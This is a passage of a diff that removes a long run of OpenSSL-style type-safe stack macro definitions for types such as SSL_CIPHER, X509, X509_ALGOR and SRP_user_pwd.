-#define sk_SRP_gN_cache_num(st) SKM_sk_num(SRP_gN_cache, (st))
-#define sk_SRP_gN_cache_value(st, i) SKM_sk_value(SRP_gN_cache, (st), (i))
-#define sk_SRP_gN_cache_set(st, i, val) SKM_sk_set(SRP_gN_cache, (st), (i), (val))
-#define sk_SRP_gN_cache_zero(st) SKM_sk_zero(SRP_gN_cache, (st))
-#define sk_SRP_gN_cache_push(st, val) SKM_sk_push(SRP_gN_cache, (st), (val))
-#define sk_SRP_gN_cache_unshift(st, val) SKM_sk_unshift(SRP_gN_cache, (st), (val))
-#define sk_SRP_gN_cache_find(st, val) SKM_sk_find(SRP_gN_cache, (st), (val))
-#define sk_SRP_gN_cache_find_ex(st, val) SKM_sk_find_ex(SRP_gN_cache, (st), (val))
-#define sk_SRP_gN_cache_delete(st, i) SKM_sk_delete(SRP_gN_cache, (st), (i))
-#define sk_SRP_gN_cache_delete_ptr(st, ptr) SKM_sk_delete_ptr(SRP_gN_cache, (st), (ptr))
-#define sk_SRP_gN_cache_insert(st, val, i) SKM_sk_insert(SRP_gN_cache, (st), (val), (i))
-#define sk_SRP_gN_cache_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(SRP_gN_cache, (st), (cmp))
-#define sk_SRP_gN_cache_dup(st) SKM_sk_dup(SRP_gN_cache, st)
-#define sk_SRP_gN_cache_pop_free(st, free_func) SKM_sk_pop_free(SRP_gN_cache, (st), (free_func))
-#define sk_SRP_gN_cache_shift(st) SKM_sk_shift(SRP_gN_cache, (st))
-#define sk_SRP_gN_cache_pop(st) SKM_sk_pop(SRP_gN_cache, (st))
-#define sk_SRP_gN_cache_sort(st) SKM_sk_sort(SRP_gN_cache, (st))
-#define sk_SRP_gN_cache_is_sorted(st) SKM_sk_is_sorted(SRP_gN_cache, (st))
-
-#define sk_SRP_user_pwd_new(cmp) SKM_sk_new(SRP_user_pwd, (cmp))
-#define sk_SRP_user_pwd_new_null() SKM_sk_new_null(SRP_user_pwd)
-#define sk_SRP_user_pwd_free(st) SKM_sk_free(SRP_user_pwd, (st))
-#define sk_SRP_user_pwd_num(st) SKM_sk_num(SRP_user_pwd, (st))
-#define sk_SRP_user_pwd_value(st, i) SKM_sk_value(SRP_user_pwd, (st), (i))
-#define sk_SRP_user_pwd_set(st, i, val) SKM_sk_set(SRP_user_pwd, (st), (i), (val))
-#define sk_SRP_user_pwd_zero(st) SKM_sk_zero(SRP_user_pwd, (st))
-#define sk_SRP_user_pwd_push(st, val) SKM_sk_push(SRP_user_pwd, (st), (val))
-#define sk_SRP_user_pwd_unshift(st, val) SKM_sk_unshift(SRP_user_pwd, (st), (val))
-#define sk_SRP_user_pwd_find(st, val) SKM_sk_find(SRP_user_pwd, (st), (val))
-#define sk_SRP_user_pwd_find_ex(st, val) SKM_sk_find_ex(SRP_user_pwd, (st), (val))
-#define sk_SRP_user_pwd_delete(st, i) SKM_sk_delete(SRP_user_pwd, (st), (i))
-#define sk_SRP_user_pwd_delete_ptr(st, ptr) SKM_sk_delete_ptr(SRP_user_pwd, (st), (ptr))
-#define sk_SRP_user_pwd_insert(st, val, i) SKM_sk_insert(SRP_user_pwd, (st), (val), (i))
-#define sk_SRP_user_pwd_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(SRP_user_pwd, (st), (cmp))
-#define sk_SRP_user_pwd_dup(st) SKM_sk_dup(SRP_user_pwd, st)
-#define sk_SRP_user_pwd_pop_free(st, free_func) SKM_sk_pop_free(SRP_user_pwd, (st), (free_func))
-#define sk_SRP_user_pwd_shift(st) SKM_sk_shift(SRP_user_pwd, (st))
-#define sk_SRP_user_pwd_pop(st) SKM_sk_pop(SRP_user_pwd, (st))
-#define sk_SRP_user_pwd_sort(st) SKM_sk_sort(SRP_user_pwd, (st))
-#define sk_SRP_user_pwd_is_sorted(st) SKM_sk_is_sorted(SRP_user_pwd, (st))
-
-#define sk_SRTP_PROTECTION_PROFILE_new(cmp) SKM_sk_new(SRTP_PROTECTION_PROFILE, (cmp))
-#define sk_SRTP_PROTECTION_PROFILE_new_null() SKM_sk_new_null(SRTP_PROTECTION_PROFILE)
-#define sk_SRTP_PROTECTION_PROFILE_free(st) SKM_sk_free(SRTP_PROTECTION_PROFILE, (st))
-#define sk_SRTP_PROTECTION_PROFILE_num(st) SKM_sk_num(SRTP_PROTECTION_PROFILE, (st))
-#define sk_SRTP_PROTECTION_PROFILE_value(st, i) SKM_sk_value(SRTP_PROTECTION_PROFILE, (st), (i))
-#define sk_SRTP_PROTECTION_PROFILE_set(st, i, val) SKM_sk_set(SRTP_PROTECTION_PROFILE, (st), (i), (val))
-#define sk_SRTP_PROTECTION_PROFILE_zero(st) SKM_sk_zero(SRTP_PROTECTION_PROFILE, (st))
-#define sk_SRTP_PROTECTION_PROFILE_push(st, val) SKM_sk_push(SRTP_PROTECTION_PROFILE, (st), (val))
-#define sk_SRTP_PROTECTION_PROFILE_unshift(st, val) SKM_sk_unshift(SRTP_PROTECTION_PROFILE, (st), (val))
-#define sk_SRTP_PROTECTION_PROFILE_find(st, val) SKM_sk_find(SRTP_PROTECTION_PROFILE, (st), (val))
-#define sk_SRTP_PROTECTION_PROFILE_find_ex(st, val) SKM_sk_find_ex(SRTP_PROTECTION_PROFILE, (st), (val))
-#define sk_SRTP_PROTECTION_PROFILE_delete(st, i) SKM_sk_delete(SRTP_PROTECTION_PROFILE, (st), (i))
-#define sk_SRTP_PROTECTION_PROFILE_delete_ptr(st, ptr) SKM_sk_delete_ptr(SRTP_PROTECTION_PROFILE, (st), (ptr))
-#define sk_SRTP_PROTECTION_PROFILE_insert(st, val, i) SKM_sk_insert(SRTP_PROTECTION_PROFILE, (st), (val), (i))
-#define sk_SRTP_PROTECTION_PROFILE_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(SRTP_PROTECTION_PROFILE, (st), (cmp))
-#define sk_SRTP_PROTECTION_PROFILE_dup(st) SKM_sk_dup(SRTP_PROTECTION_PROFILE, st)
-#define sk_SRTP_PROTECTION_PROFILE_pop_free(st, free_func) SKM_sk_pop_free(SRTP_PROTECTION_PROFILE, (st), (free_func))
-#define sk_SRTP_PROTECTION_PROFILE_shift(st) SKM_sk_shift(SRTP_PROTECTION_PROFILE, (st))
-#define sk_SRTP_PROTECTION_PROFILE_pop(st) SKM_sk_pop(SRTP_PROTECTION_PROFILE, (st))
-#define sk_SRTP_PROTECTION_PROFILE_sort(st) SKM_sk_sort(SRTP_PROTECTION_PROFILE, (st))
-#define sk_SRTP_PROTECTION_PROFILE_is_sorted(st) SKM_sk_is_sorted(SRTP_PROTECTION_PROFILE, (st))
-
-#define sk_SSL_CIPHER_new(cmp) SKM_sk_new(SSL_CIPHER, (cmp))
-#define sk_SSL_CIPHER_new_null() SKM_sk_new_null(SSL_CIPHER)
-#define sk_SSL_CIPHER_free(st) SKM_sk_free(SSL_CIPHER, (st))
-#define sk_SSL_CIPHER_num(st) SKM_sk_num(SSL_CIPHER, (st))
-#define sk_SSL_CIPHER_value(st, i) SKM_sk_value(SSL_CIPHER, (st), (i))
-#define sk_SSL_CIPHER_set(st, i, val) SKM_sk_set(SSL_CIPHER, (st), (i), (val))
-#define sk_SSL_CIPHER_zero(st) SKM_sk_zero(SSL_CIPHER, (st))
-#define sk_SSL_CIPHER_push(st, val) SKM_sk_push(SSL_CIPHER, (st), (val))
-#define sk_SSL_CIPHER_unshift(st, val) SKM_sk_unshift(SSL_CIPHER, (st), (val))
-#define sk_SSL_CIPHER_find(st, val) SKM_sk_find(SSL_CIPHER, (st), (val))
-#define sk_SSL_CIPHER_find_ex(st, val) SKM_sk_find_ex(SSL_CIPHER, (st), (val))
-#define sk_SSL_CIPHER_delete(st, i) SKM_sk_delete(SSL_CIPHER, (st), (i))
-#define sk_SSL_CIPHER_delete_ptr(st, ptr) SKM_sk_delete_ptr(SSL_CIPHER, (st), (ptr))
-#define sk_SSL_CIPHER_insert(st, val, i) SKM_sk_insert(SSL_CIPHER, (st), (val), (i))
-#define sk_SSL_CIPHER_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(SSL_CIPHER, (st), (cmp))
-#define sk_SSL_CIPHER_dup(st) SKM_sk_dup(SSL_CIPHER, st)
-#define sk_SSL_CIPHER_pop_free(st, free_func) SKM_sk_pop_free(SSL_CIPHER, (st), (free_func))
-#define sk_SSL_CIPHER_shift(st) SKM_sk_shift(SSL_CIPHER, (st))
-#define sk_SSL_CIPHER_pop(st) SKM_sk_pop(SSL_CIPHER, (st))
-#define sk_SSL_CIPHER_sort(st) SKM_sk_sort(SSL_CIPHER, (st))
-#define sk_SSL_CIPHER_is_sorted(st) SKM_sk_is_sorted(SSL_CIPHER, (st))
-
-#define sk_SSL_COMP_new(cmp) SKM_sk_new(SSL_COMP, (cmp))
-#define sk_SSL_COMP_new_null() SKM_sk_new_null(SSL_COMP)
-#define sk_SSL_COMP_free(st) SKM_sk_free(SSL_COMP, (st))
-#define sk_SSL_COMP_num(st) SKM_sk_num(SSL_COMP, (st))
-#define sk_SSL_COMP_value(st, i) SKM_sk_value(SSL_COMP, (st), (i))
-#define sk_SSL_COMP_set(st, i, val) SKM_sk_set(SSL_COMP, (st), (i), (val))
-#define sk_SSL_COMP_zero(st) SKM_sk_zero(SSL_COMP, (st))
-#define sk_SSL_COMP_push(st, val) SKM_sk_push(SSL_COMP, (st), (val))
-#define sk_SSL_COMP_unshift(st, val) SKM_sk_unshift(SSL_COMP, (st), (val))
-#define sk_SSL_COMP_find(st, val) SKM_sk_find(SSL_COMP, (st), (val))
-#define sk_SSL_COMP_find_ex(st, val) SKM_sk_find_ex(SSL_COMP, (st), (val))
-#define sk_SSL_COMP_delete(st, i) SKM_sk_delete(SSL_COMP, (st), (i))
-#define sk_SSL_COMP_delete_ptr(st, ptr) SKM_sk_delete_ptr(SSL_COMP, (st), (ptr))
-#define sk_SSL_COMP_insert(st, val, i) SKM_sk_insert(SSL_COMP, (st), (val), (i))
-#define sk_SSL_COMP_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(SSL_COMP, (st), (cmp))
-#define sk_SSL_COMP_dup(st) SKM_sk_dup(SSL_COMP, st)
-#define sk_SSL_COMP_pop_free(st, free_func) SKM_sk_pop_free(SSL_COMP, (st), (free_func))
-#define sk_SSL_COMP_shift(st) SKM_sk_shift(SSL_COMP, (st))
-#define sk_SSL_COMP_pop(st) SKM_sk_pop(SSL_COMP, (st))
-#define sk_SSL_COMP_sort(st) SKM_sk_sort(SSL_COMP, (st))
-#define sk_SSL_COMP_is_sorted(st) SKM_sk_is_sorted(SSL_COMP, (st))
-
-#define sk_STACK_OF_X509_NAME_ENTRY_new(cmp) SKM_sk_new(STACK_OF_X509_NAME_ENTRY, (cmp))
-#define sk_STACK_OF_X509_NAME_ENTRY_new_null() SKM_sk_new_null(STACK_OF_X509_NAME_ENTRY)
-#define sk_STACK_OF_X509_NAME_ENTRY_free(st) SKM_sk_free(STACK_OF_X509_NAME_ENTRY, (st))
-#define sk_STACK_OF_X509_NAME_ENTRY_num(st) SKM_sk_num(STACK_OF_X509_NAME_ENTRY, (st))
-#define sk_STACK_OF_X509_NAME_ENTRY_value(st, i) SKM_sk_value(STACK_OF_X509_NAME_ENTRY, (st), (i))
-#define sk_STACK_OF_X509_NAME_ENTRY_set(st, i, val) SKM_sk_set(STACK_OF_X509_NAME_ENTRY, (st), (i), (val))
-#define sk_STACK_OF_X509_NAME_ENTRY_zero(st) SKM_sk_zero(STACK_OF_X509_NAME_ENTRY, (st))
-#define sk_STACK_OF_X509_NAME_ENTRY_push(st, val) SKM_sk_push(STACK_OF_X509_NAME_ENTRY, (st), (val))
-#define sk_STACK_OF_X509_NAME_ENTRY_unshift(st, val) SKM_sk_unshift(STACK_OF_X509_NAME_ENTRY, (st), (val))
-#define sk_STACK_OF_X509_NAME_ENTRY_find(st, val) SKM_sk_find(STACK_OF_X509_NAME_ENTRY, (st), (val))
-#define sk_STACK_OF_X509_NAME_ENTRY_find_ex(st, val) SKM_sk_find_ex(STACK_OF_X509_NAME_ENTRY, (st), (val))
-#define sk_STACK_OF_X509_NAME_ENTRY_delete(st, i) SKM_sk_delete(STACK_OF_X509_NAME_ENTRY, (st), (i))
-#define sk_STACK_OF_X509_NAME_ENTRY_delete_ptr(st, ptr) SKM_sk_delete_ptr(STACK_OF_X509_NAME_ENTRY, (st), (ptr))
-#define sk_STACK_OF_X509_NAME_ENTRY_insert(st, val, i) SKM_sk_insert(STACK_OF_X509_NAME_ENTRY, (st), (val), (i))
-#define sk_STACK_OF_X509_NAME_ENTRY_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(STACK_OF_X509_NAME_ENTRY, (st), (cmp))
-#define sk_STACK_OF_X509_NAME_ENTRY_dup(st) SKM_sk_dup(STACK_OF_X509_NAME_ENTRY, st)
-#define sk_STACK_OF_X509_NAME_ENTRY_pop_free(st, free_func) SKM_sk_pop_free(STACK_OF_X509_NAME_ENTRY, (st), (free_func))
-#define sk_STACK_OF_X509_NAME_ENTRY_shift(st) SKM_sk_shift(STACK_OF_X509_NAME_ENTRY, (st))
-#define sk_STACK_OF_X509_NAME_ENTRY_pop(st) SKM_sk_pop(STACK_OF_X509_NAME_ENTRY, (st))
-#define sk_STACK_OF_X509_NAME_ENTRY_sort(st) SKM_sk_sort(STACK_OF_X509_NAME_ENTRY, (st))
-#define sk_STACK_OF_X509_NAME_ENTRY_is_sorted(st) SKM_sk_is_sorted(STACK_OF_X509_NAME_ENTRY, (st))
-
-#define sk_STORE_ATTR_INFO_new(cmp) SKM_sk_new(STORE_ATTR_INFO, (cmp))
-#define sk_STORE_ATTR_INFO_new_null() SKM_sk_new_null(STORE_ATTR_INFO)
-#define sk_STORE_ATTR_INFO_free(st) SKM_sk_free(STORE_ATTR_INFO, (st))
-#define sk_STORE_ATTR_INFO_num(st) SKM_sk_num(STORE_ATTR_INFO, (st))
-#define sk_STORE_ATTR_INFO_value(st, i) SKM_sk_value(STORE_ATTR_INFO, (st), (i))
-#define sk_STORE_ATTR_INFO_set(st, i, val) SKM_sk_set(STORE_ATTR_INFO, (st), (i), (val))
-#define sk_STORE_ATTR_INFO_zero(st) SKM_sk_zero(STORE_ATTR_INFO, (st))
-#define sk_STORE_ATTR_INFO_push(st, val) SKM_sk_push(STORE_ATTR_INFO, (st), (val))
-#define sk_STORE_ATTR_INFO_unshift(st, val) SKM_sk_unshift(STORE_ATTR_INFO, (st), (val))
-#define sk_STORE_ATTR_INFO_find(st, val) SKM_sk_find(STORE_ATTR_INFO, (st), (val))
-#define sk_STORE_ATTR_INFO_find_ex(st, val) SKM_sk_find_ex(STORE_ATTR_INFO, (st), (val))
-#define sk_STORE_ATTR_INFO_delete(st, i) SKM_sk_delete(STORE_ATTR_INFO, (st), (i))
-#define sk_STORE_ATTR_INFO_delete_ptr(st, ptr) SKM_sk_delete_ptr(STORE_ATTR_INFO, (st), (ptr))
-#define sk_STORE_ATTR_INFO_insert(st, val, i) SKM_sk_insert(STORE_ATTR_INFO, (st), (val), (i))
-#define sk_STORE_ATTR_INFO_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(STORE_ATTR_INFO, (st), (cmp))
-#define sk_STORE_ATTR_INFO_dup(st) SKM_sk_dup(STORE_ATTR_INFO, st)
-#define sk_STORE_ATTR_INFO_pop_free(st, free_func) SKM_sk_pop_free(STORE_ATTR_INFO, (st), (free_func))
-#define sk_STORE_ATTR_INFO_shift(st) SKM_sk_shift(STORE_ATTR_INFO, (st))
-#define sk_STORE_ATTR_INFO_pop(st) SKM_sk_pop(STORE_ATTR_INFO, (st))
-#define sk_STORE_ATTR_INFO_sort(st) SKM_sk_sort(STORE_ATTR_INFO, (st))
-#define sk_STORE_ATTR_INFO_is_sorted(st) SKM_sk_is_sorted(STORE_ATTR_INFO, (st))
-
-#define sk_STORE_OBJECT_new(cmp) SKM_sk_new(STORE_OBJECT, (cmp))
-#define sk_STORE_OBJECT_new_null() SKM_sk_new_null(STORE_OBJECT)
-#define sk_STORE_OBJECT_free(st) SKM_sk_free(STORE_OBJECT, (st))
-#define sk_STORE_OBJECT_num(st) SKM_sk_num(STORE_OBJECT, (st))
-#define sk_STORE_OBJECT_value(st, i) SKM_sk_value(STORE_OBJECT, (st), (i))
-#define sk_STORE_OBJECT_set(st, i, val) SKM_sk_set(STORE_OBJECT, (st), (i), (val))
-#define sk_STORE_OBJECT_zero(st) SKM_sk_zero(STORE_OBJECT, (st))
-#define sk_STORE_OBJECT_push(st, val) SKM_sk_push(STORE_OBJECT, (st), (val))
-#define sk_STORE_OBJECT_unshift(st, val) SKM_sk_unshift(STORE_OBJECT, (st), (val))
-#define sk_STORE_OBJECT_find(st, val) SKM_sk_find(STORE_OBJECT, (st), (val))
-#define sk_STORE_OBJECT_find_ex(st, val) SKM_sk_find_ex(STORE_OBJECT, (st), (val))
-#define sk_STORE_OBJECT_delete(st, i) SKM_sk_delete(STORE_OBJECT, (st), (i))
-#define sk_STORE_OBJECT_delete_ptr(st, ptr) SKM_sk_delete_ptr(STORE_OBJECT, (st), (ptr))
-#define sk_STORE_OBJECT_insert(st, val, i) SKM_sk_insert(STORE_OBJECT, (st), (val), (i))
-#define sk_STORE_OBJECT_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(STORE_OBJECT, (st), (cmp))
-#define sk_STORE_OBJECT_dup(st) SKM_sk_dup(STORE_OBJECT, st)
-#define sk_STORE_OBJECT_pop_free(st, free_func) SKM_sk_pop_free(STORE_OBJECT, (st), (free_func))
-#define sk_STORE_OBJECT_shift(st) SKM_sk_shift(STORE_OBJECT, (st))
-#define sk_STORE_OBJECT_pop(st) SKM_sk_pop(STORE_OBJECT, (st))
-#define sk_STORE_OBJECT_sort(st) SKM_sk_sort(STORE_OBJECT, (st))
-#define sk_STORE_OBJECT_is_sorted(st) SKM_sk_is_sorted(STORE_OBJECT, (st))
-
-#define sk_SXNETID_new(cmp) SKM_sk_new(SXNETID, (cmp))
-#define sk_SXNETID_new_null() SKM_sk_new_null(SXNETID)
-#define sk_SXNETID_free(st) SKM_sk_free(SXNETID, (st))
-#define sk_SXNETID_num(st) SKM_sk_num(SXNETID, (st))
-#define sk_SXNETID_value(st, i) SKM_sk_value(SXNETID, (st), (i))
-#define sk_SXNETID_set(st, i, val) SKM_sk_set(SXNETID, (st), (i), (val))
-#define sk_SXNETID_zero(st) SKM_sk_zero(SXNETID, (st))
-#define sk_SXNETID_push(st, val) SKM_sk_push(SXNETID, (st), (val))
-#define sk_SXNETID_unshift(st, val) SKM_sk_unshift(SXNETID, (st), (val))
-#define sk_SXNETID_find(st, val) SKM_sk_find(SXNETID, (st), (val))
-#define sk_SXNETID_find_ex(st, val) SKM_sk_find_ex(SXNETID, (st), (val))
-#define sk_SXNETID_delete(st, i) SKM_sk_delete(SXNETID, (st), (i))
-#define sk_SXNETID_delete_ptr(st, ptr) SKM_sk_delete_ptr(SXNETID, (st), (ptr))
-#define sk_SXNETID_insert(st, val, i) SKM_sk_insert(SXNETID, (st), (val), (i))
-#define sk_SXNETID_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(SXNETID, (st), (cmp))
-#define sk_SXNETID_dup(st) SKM_sk_dup(SXNETID, st)
-#define sk_SXNETID_pop_free(st, free_func) SKM_sk_pop_free(SXNETID, (st), (free_func))
-#define sk_SXNETID_shift(st) SKM_sk_shift(SXNETID, (st))
-#define sk_SXNETID_pop(st) SKM_sk_pop(SXNETID, (st))
-#define sk_SXNETID_sort(st) SKM_sk_sort(SXNETID, (st))
-#define sk_SXNETID_is_sorted(st) SKM_sk_is_sorted(SXNETID, (st))
-
-#define sk_UI_STRING_new(cmp) SKM_sk_new(UI_STRING, (cmp))
-#define sk_UI_STRING_new_null() SKM_sk_new_null(UI_STRING)
-#define sk_UI_STRING_free(st) SKM_sk_free(UI_STRING, (st))
-#define sk_UI_STRING_num(st) SKM_sk_num(UI_STRING, (st))
-#define sk_UI_STRING_value(st, i) SKM_sk_value(UI_STRING, (st), (i))
-#define sk_UI_STRING_set(st, i, val) SKM_sk_set(UI_STRING, (st), (i), (val))
-#define sk_UI_STRING_zero(st) SKM_sk_zero(UI_STRING, (st))
-#define sk_UI_STRING_push(st, val) SKM_sk_push(UI_STRING, (st), (val))
-#define sk_UI_STRING_unshift(st, val) SKM_sk_unshift(UI_STRING, (st), (val))
-#define sk_UI_STRING_find(st, val) SKM_sk_find(UI_STRING, (st), (val))
-#define sk_UI_STRING_find_ex(st, val) SKM_sk_find_ex(UI_STRING, (st), (val))
-#define sk_UI_STRING_delete(st, i) SKM_sk_delete(UI_STRING, (st), (i))
-#define sk_UI_STRING_delete_ptr(st, ptr) SKM_sk_delete_ptr(UI_STRING, (st), (ptr))
-#define sk_UI_STRING_insert(st, val, i) SKM_sk_insert(UI_STRING, (st), (val), (i))
-#define sk_UI_STRING_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(UI_STRING, (st), (cmp))
-#define sk_UI_STRING_dup(st) SKM_sk_dup(UI_STRING, st)
-#define sk_UI_STRING_pop_free(st, free_func) SKM_sk_pop_free(UI_STRING, (st), (free_func))
-#define sk_UI_STRING_shift(st) SKM_sk_shift(UI_STRING, (st))
-#define sk_UI_STRING_pop(st) SKM_sk_pop(UI_STRING, (st))
-#define sk_UI_STRING_sort(st) SKM_sk_sort(UI_STRING, (st))
-#define sk_UI_STRING_is_sorted(st) SKM_sk_is_sorted(UI_STRING, (st))
-
-#define sk_X509_new(cmp) SKM_sk_new(X509, (cmp))
-#define sk_X509_new_null() SKM_sk_new_null(X509)
-#define sk_X509_free(st) SKM_sk_free(X509, (st))
-#define sk_X509_num(st) SKM_sk_num(X509, (st))
-#define sk_X509_value(st, i) SKM_sk_value(X509, (st), (i))
-#define sk_X509_set(st, i, val) SKM_sk_set(X509, (st), (i), (val))
-#define sk_X509_zero(st) SKM_sk_zero(X509, (st))
-#define sk_X509_push(st, val) SKM_sk_push(X509, (st), (val))
-#define sk_X509_unshift(st, val) SKM_sk_unshift(X509, (st), (val))
-#define sk_X509_find(st, val) SKM_sk_find(X509, (st), (val))
-#define sk_X509_find_ex(st, val) SKM_sk_find_ex(X509, (st), (val))
-#define sk_X509_delete(st, i) SKM_sk_delete(X509, (st), (i))
-#define sk_X509_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509, (st), (ptr))
-#define sk_X509_insert(st, val, i) SKM_sk_insert(X509, (st), (val), (i))
-#define sk_X509_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509, (st), (cmp))
-#define sk_X509_dup(st) SKM_sk_dup(X509, st)
-#define sk_X509_pop_free(st, free_func) SKM_sk_pop_free(X509, (st), (free_func))
-#define sk_X509_shift(st) SKM_sk_shift(X509, (st))
-#define sk_X509_pop(st) SKM_sk_pop(X509, (st))
-#define sk_X509_sort(st) SKM_sk_sort(X509, (st))
-#define sk_X509_is_sorted(st) SKM_sk_is_sorted(X509, (st))
-
-#define sk_X509V3_EXT_METHOD_new(cmp) SKM_sk_new(X509V3_EXT_METHOD, (cmp))
-#define sk_X509V3_EXT_METHOD_new_null() SKM_sk_new_null(X509V3_EXT_METHOD)
-#define sk_X509V3_EXT_METHOD_free(st) SKM_sk_free(X509V3_EXT_METHOD, (st))
-#define sk_X509V3_EXT_METHOD_num(st) SKM_sk_num(X509V3_EXT_METHOD, (st))
-#define sk_X509V3_EXT_METHOD_value(st, i) SKM_sk_value(X509V3_EXT_METHOD, (st), (i))
-#define sk_X509V3_EXT_METHOD_set(st, i, val) SKM_sk_set(X509V3_EXT_METHOD, (st), (i), (val))
-#define sk_X509V3_EXT_METHOD_zero(st) SKM_sk_zero(X509V3_EXT_METHOD, (st))
-#define sk_X509V3_EXT_METHOD_push(st, val) SKM_sk_push(X509V3_EXT_METHOD, (st), (val))
-#define sk_X509V3_EXT_METHOD_unshift(st, val) SKM_sk_unshift(X509V3_EXT_METHOD, (st), (val))
-#define sk_X509V3_EXT_METHOD_find(st, val) SKM_sk_find(X509V3_EXT_METHOD, (st), (val))
-#define sk_X509V3_EXT_METHOD_find_ex(st, val) SKM_sk_find_ex(X509V3_EXT_METHOD, (st), (val))
-#define sk_X509V3_EXT_METHOD_delete(st, i) SKM_sk_delete(X509V3_EXT_METHOD, (st), (i))
-#define sk_X509V3_EXT_METHOD_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509V3_EXT_METHOD, (st), (ptr))
-#define sk_X509V3_EXT_METHOD_insert(st, val, i) SKM_sk_insert(X509V3_EXT_METHOD, (st), (val), (i))
-#define sk_X509V3_EXT_METHOD_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509V3_EXT_METHOD, (st), (cmp))
-#define sk_X509V3_EXT_METHOD_dup(st) SKM_sk_dup(X509V3_EXT_METHOD, st)
-#define sk_X509V3_EXT_METHOD_pop_free(st, free_func) SKM_sk_pop_free(X509V3_EXT_METHOD, (st), (free_func))
-#define sk_X509V3_EXT_METHOD_shift(st) SKM_sk_shift(X509V3_EXT_METHOD, (st))
-#define sk_X509V3_EXT_METHOD_pop(st) SKM_sk_pop(X509V3_EXT_METHOD, (st))
-#define sk_X509V3_EXT_METHOD_sort(st) SKM_sk_sort(X509V3_EXT_METHOD, (st))
-#define sk_X509V3_EXT_METHOD_is_sorted(st) SKM_sk_is_sorted(X509V3_EXT_METHOD, (st))
-
-#define sk_X509_ALGOR_new(cmp) SKM_sk_new(X509_ALGOR, (cmp))
-#define sk_X509_ALGOR_new_null() SKM_sk_new_null(X509_ALGOR)
-#define sk_X509_ALGOR_free(st) SKM_sk_free(X509_ALGOR, (st))
-#define sk_X509_ALGOR_num(st) SKM_sk_num(X509_ALGOR, (st))
-#define sk_X509_ALGOR_value(st, i) SKM_sk_value(X509_ALGOR, (st), (i))
-#define sk_X509_ALGOR_set(st, i, val) SKM_sk_set(X509_ALGOR, (st), (i), (val))
-#define sk_X509_ALGOR_zero(st) SKM_sk_zero(X509_ALGOR, (st))
-#define sk_X509_ALGOR_push(st, val) SKM_sk_push(X509_ALGOR, (st), (val))
-#define sk_X509_ALGOR_unshift(st, val) SKM_sk_unshift(X509_ALGOR, (st), (val))
-#define sk_X509_ALGOR_find(st, val) SKM_sk_find(X509_ALGOR, (st), (val))
-#define sk_X509_ALGOR_find_ex(st, val) SKM_sk_find_ex(X509_ALGOR, (st), (val))
-#define sk_X509_ALGOR_delete(st, i) SKM_sk_delete(X509_ALGOR, (st), (i))
-#define sk_X509_ALGOR_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_ALGOR, (st), (ptr))
-#define sk_X509_ALGOR_insert(st, val, i) SKM_sk_insert(X509_ALGOR, (st), (val), (i))
-#define sk_X509_ALGOR_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_ALGOR, (st), (cmp))
-#define sk_X509_ALGOR_dup(st) SKM_sk_dup(X509_ALGOR, st)
-#define sk_X509_ALGOR_pop_free(st, free_func) SKM_sk_pop_free(X509_ALGOR, (st), (free_func))
-#define sk_X509_ALGOR_shift(st) SKM_sk_shift(X509_ALGOR, (st))
-#define sk_X509_ALGOR_pop(st) SKM_sk_pop(X509_ALGOR, (st))
-#define sk_X509_ALGOR_sort(st) SKM_sk_sort(X509_ALGOR, (st))
-#define sk_X509_ALGOR_is_sorted(st) SKM_sk_is_sorted(X509_ALGOR, (st))
-
-#define sk_X509_ATTRIBUTE_new(cmp) SKM_sk_new(X509_ATTRIBUTE, (cmp))
-#define sk_X509_ATTRIBUTE_new_null() SKM_sk_new_null(X509_ATTRIBUTE)
-#define sk_X509_ATTRIBUTE_free(st) SKM_sk_free(X509_ATTRIBUTE, (st))
-#define sk_X509_ATTRIBUTE_num(st) SKM_sk_num(X509_ATTRIBUTE, (st))
-#define sk_X509_ATTRIBUTE_value(st, i) SKM_sk_value(X509_ATTRIBUTE, (st), (i))
-#define sk_X509_ATTRIBUTE_set(st, i, val) SKM_sk_set(X509_ATTRIBUTE, (st), (i), (val))
-#define sk_X509_ATTRIBUTE_zero(st) SKM_sk_zero(X509_ATTRIBUTE, (st))
-#define sk_X509_ATTRIBUTE_push(st, val) SKM_sk_push(X509_ATTRIBUTE, (st), (val))
-#define sk_X509_ATTRIBUTE_unshift(st, val) SKM_sk_unshift(X509_ATTRIBUTE, (st), (val))
-#define sk_X509_ATTRIBUTE_find(st, val) SKM_sk_find(X509_ATTRIBUTE, (st), (val))
-#define sk_X509_ATTRIBUTE_find_ex(st, val) SKM_sk_find_ex(X509_ATTRIBUTE, (st), (val))
-#define sk_X509_ATTRIBUTE_delete(st, i) SKM_sk_delete(X509_ATTRIBUTE, (st), (i))
-#define sk_X509_ATTRIBUTE_delete_ptr(st, ptr) SKM_sk_delete_ptr(X509_ATTRIBUTE, (st), (ptr))
-#define sk_X509_ATTRIBUTE_insert(st, val, i) SKM_sk_insert(X509_ATTRIBUTE, (st), (val), (i))
-#define sk_X509_ATTRIBUTE_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(X509_ATTRIBUTE, (st), (cmp))
-#define sk_X509_ATTRIBUTE_dup(st) SKM_sk_dup(X509_ATTRIBUTE, st)
-#define sk_X509_ATTRIBUTE_pop_free(st, free_func) SKM_sk_pop_free(X509_ATTRIBUTE, (st), (free_func))
-#define sk_X509_ATTRIBUTE_shift(st) SKM_sk_shift(X509_ATTRIBUTE, (st))
-#define sk_X509_ATTRIBUTE_pop(st) SKM_sk_pop(X509_ATTRIBUTE, (st))
-#define sk_X509_ATTRIBUTE_sort(st) SKM_sk_sort(X509_ATTRIBUTE, (st))
-#define sk_X509_ATTRIBUTE_is_sorted(st) SKM_sk_is_sorted(X509_ATTRIBUTE, (st))
-
-#define sk_X509_CRL_new(cmp) SKM_sk_new(X509_CRL, (cmp))
